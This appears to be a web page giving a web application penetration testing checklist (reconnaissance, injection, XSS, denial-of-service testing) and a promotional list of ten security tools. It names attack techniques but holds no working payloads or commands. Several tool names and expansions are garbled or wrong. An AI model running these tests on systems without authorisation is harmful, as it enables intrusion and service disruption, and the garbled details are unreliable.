Web Application Pentesting is a method of identifying, analyzing and Report the vulnerabilities which are existing in the Web application including buffer overflow, input validation, code Execution, Bypass Authentication, SQL Injection, CSRF, Cross-site scripting in the target web Application which is given for Penetration Testing.
Repeatable Testing and Conduct a serious method One of the Best Method conduct Web Application Penetration Testing for all kind of web application vulnerabilities.
Web Application Penetration Testing Checklist
Information Gathering
1. Retrieve and Analyze the robot.txt files by using a tool called GNU Wget.
2. Examine the version of the software. database Details, the error technical component, bugs by the error codes by requesting invalid pages.
3. Implement techniques such as DNS inverse queries, DNS zone Transfers, web-based DNS Searches.
4. Perform Directory style Searching and vulnerability scanning, Probe for URLs, using tools such as NMAP and Nessus.
5. Identify the Entry point of the application using Burp Proxy, OWSAP ZAP, TemperIE, WebscarabTemper Data.
6. By using traditional Fingerprint Tool such as Nmap, Amap, perform TCP/ICMP and service Fingerprinting.
7.By Requesting Common File Extension such as.ASP,EXE, .HTML, .PHP ,Test for recognized file types/Extensions/Directories.
8. Examine the Sources code From the Accessing Pages of the Application front end.
Data Validation Testing
1. Performing Sources code Analyze for javascript Coding Errors.
2. Perform Union Query SQL injection testing, standard SQL injection Testing, blind SQL query Testing, using tools such as sqlninja,sqldumper,sql power injector .etc.
3. Analyze the HTML Code, Test for stored XSS, leverage stored XSS, using tools such as XSS proxy, Backframe, Burp Proxy, OWASP, ZAP, XSS Assistant.
4. Perform LDAP injection testing for sensitive information about users and hosts.
5. Perform IMAP/SMTP injection Testing for Access the Backend Mail server.
6.Perform XPATH Injection Testing for Accessing the confidential information
7. Perform XML injection testing to know information about XML Structure.
8. Perform Code injection testing to identify input validation Error.
9. Perform Buffer Overflow testing for Stack and heap memory information and application control flow.
10. Test for HTTP Splitting and smuggling for cookies and HTTP redirect information.
Denial of Service Testing
1. Send Any Large number of Requests that perform database operations and observe any Slowdown and New Error Messages.
2.Perform manual source code analysis and submit a range of input varying lengths to the applications
3.Test for SQL wildcard attacks for application information testing. Enterprise Networks should choose the best DDoS Attack prevention services to ensure the DDoS attack protection and prevent their network
4. Test for User specifies object allocation whether a maximum number of object that application can handle.
5. Enter Extreme Large number of the input field used by the application as a Loop counter. Protect website from future attacks Also Check your Companies DDOS Attack Downtime Cost.
6. Use a script to automatically submit an extremely long value for the server can be logged the request.
Top 10 Best Penetration Testing (Pen Test) Vapt Tools in 2021
1) Netsparker
Netsparker is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution.
Features
Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology.
Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages.
REST API for seamless integration with the SDLC, bug tracking systems etc.
Fully scalable solution. Scan 1,000 web applications in just 24 hours.
2) Acunetix
Acunetix is a fully automated penetration testing tool. Its web application security scanner accurately scans HTML5, JavaScript and Single-page applications. It can audit complex, authenticated webapps and issues compliance and management reports on a wide range of web and network vulnerabilities, including out-of-band vulnerabilities.
Features:
Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities
Detects over 1200 WordPress core, theme, and plugin vulnerabilities
Fast & Scalable – crawls hundreds of thousands of pages without interruptions
Integrates with popular WAFs and Issue Trackers to aid in the SDLC
Available On Premises and as a Cloud solution.
3) Intruder
Intruder is a powerful, automated penetration testing tool that discovers security weaknesses across your IT environment. Offering industry-leading security checks, continuous monitoring and an easy-to-use platform, Intruder keeps businesses of all sizes safe from hackers.
Features
Best-in-class threat coverage with over 10,000 security checks
Checks for configuration weaknesses, missing patches, application weaknesses (such as SQL injection & cross-site scripting) and more
Automatic analysis and prioritisation of scan results
Intuitive interface, quick to set-up and run your first scans
Proactive security monitoring for the latest vulnerabilities
AWS, Azure and Google Cloud connectors
API integration with your CI/CD pipeline
4) Indusface
Indusface WAS offers manual Penetration testing and automated scanning to detect and report vulnerabilities based on OWASP top 10 and SANS top 25.
Features
Crawler scans single page applications
Pause and resume feature
Manual PT and Automated scanner reports displayed in the same dashboard
Unlimited proof of concept requests offers evidence of reported vulnerabilities and helps eliminate false positive from automated scan findings
Optional WAF integration to provide instant virtual patching with Zero False positive
Automatically expands crawl coverage based on real traffic data from the WAF systems (incase WAF is subscribed and used)
24×7 support to discuss remediation guidelines/POC
Intrusion Detection Software is a tool that enables you to detect all types of advanced threats. It provides compliance reporting for DSS (Decision Support System) and HIPAA. This application can continuously monitor suspicious attacks and activity.
Features:
Minimize intrusion detection efforts.
Offers compliance with effective reporting.
Provides real time logs.
It can detect malicious IPs, applications, accounts, and more.
6) TraceRoute
TraceRoute is application that enables you to analyze network path. This software can identify IP addresses, hostnames, and packet loss. It provides accurate analysis through command line interface
Features:
It offers both TCP and ICMP network path analysis.
This application can create a txt logfile.
Supports both IP4 and IPV6.
Detect path changes and give you a notification.
Allows continuous probing of a network.
7) ExpressVPN
ExpressVPN secures internet browsing against three-letter agencies and scammers. It offers unlimited access to music, social media, and video such that these programs never log IP addresses, browsing history, DNS queries, or traffic destination.
Features:
Servers in 160 locations and 94 countries
Connect to the VPN without any bandwidth limitation.
Provides online protection using leak proofing and encryption.
Stay secure by hiding IP address and encrypting your network data.
Assistance is available 24/7 via email as well as live chat.
Pay with Bitcoin and use Tor in order to access hidden sites.
8) Owasp
The Open Web Application Security Project (OWASP) is a worldwide non-profit organization focused on improving the security of software. The project has multiple tools to pen test various software environments and protocols. Flagship tools of the project include
Zed Attack Proxy (ZAP – an integrated penetration testing tool)
OWASP Dependency Check (it scans for project dependencies and checks against know vulnerabilities)
OWASP Web Testing Environment Project (collection of security tools and documentation)
The OWASP testing guide gives "best practice" to penetration test the most common web application
9) WireShark
Wireshark is a network analysis pentest tool previously known as Ethereal. It is one of the best penetration testing tools that captures packet in real time and display them in human readable format. Basically, it is a network packet analyzer- which provides the minute details about your network protocols, decryption, packet information, etc. It is an open source and can be used on Linux, Windows, OS X, Solaris, NetBSD, FreeBSD and many other systems. The information that is retrieved via this tool can be viewed through a GUI or the TTY mode TShark Utility.
WireShark features include
Live capture and offline analysis
Rich VoIP analysis
Capture files compressed with gzip can be decompressed on the fly
Output can be exported to XML, PostScript, CSV or plain text
Multi-platform: Runs on windows, Linux, FreeBSD, NetBSD and many others
Live data can be read from internet, PPP/HDLC, ATM, Blue-tooth, USB, Token Ring, etc.
Decryption support for many protocols that include IPsec, ISAKMP, SSL/TLS,WEP, and WPA/WPA2
For quick intuitive analysis, coloring rules can be applied to the packet
Read/Write many different capture file formats
10) w3af
w3af is a web application attack and audit framework. It has three types of plugins; discovery, audit and attack that communicate with each other for any vulnerabilities in site, for example a discovery plugin in w3af looks for different url's to test for vulnerabilities and forward it to the audit plugin which then uses these URL's to search for vulnerabilities.
It can also be configured to run as a MITM proxy. The request intercepted could be sent to the request generator and then manual web application testing can be performed using variable parameters. It also has features to exploit the vulnerabilities that it finds.
W3af features
Proxy support
HTTP response cache
DNS cache
File uploading using multipart
Cookie handling
HTTP basic and digest authentication
User agent faking
Add custom headers to requests
Comments